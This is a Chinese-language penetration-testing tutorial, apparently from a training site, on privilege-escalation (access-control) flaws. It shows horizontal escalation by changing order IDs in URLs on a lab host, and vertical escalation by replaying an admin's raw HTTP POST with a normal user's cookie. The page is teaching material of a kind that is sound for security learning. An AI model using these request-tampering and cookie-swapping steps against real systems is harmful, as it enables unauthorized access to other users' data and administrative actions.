1. 首页
  2. 渗透测试

[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用

1、什么是越权漏洞
越权漏洞是一种很常见的逻辑安全漏洞。可以这样理解:服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致攻击账号拥有了其他账户的增删改查功能。
越权漏洞分类
2、平行越权
就是相同级别(权限)的用户或者同一角色不同的用户之间,可以越权访问、修改或者删除的非法操作。
两个相同权限的账号分别是moonteam moon 密码都是x123456
这个是moon的订单
http://www.rbac.com/www/index.php/order-view-4.html
这个4的数字是可以变化的 查询3的时候 是moonteam这个用户的数据 查看1的时候是账号demo的订单。

[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用
[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用

相同用户权限之间的越权就做水平越权

3、垂直越权
垂直越权是不同级别之间或不同角色之间的越权
用moon账号新建一个帖子 用admin登录系统得转帖的数据包。
POST /www/index.php/thread-transfer-5.html HTTP/1.1
Host: www.rbac.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.rbac.com/www/index.php/thread/5.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 13
Connection: close
Cookie: t=%2C4%2C; theme=default; frontsid=suuf9cuo95geo78r5mhgkilvr6; frontLang=zh-cn; productViewType=card

targetBoard=5
用moonteam的权限去转移帖子。

登录moonteam 账号 把cookie信息替换

[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用

转移成功

[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用

一般垂直越权 都是用一个普通账号是测试 较高的用户的一些操作比如增删该查。测试的方法就是cookie之间的替换。

4、带来的危害
越权查询
越权删除
越权修改
越权增加

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/329.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息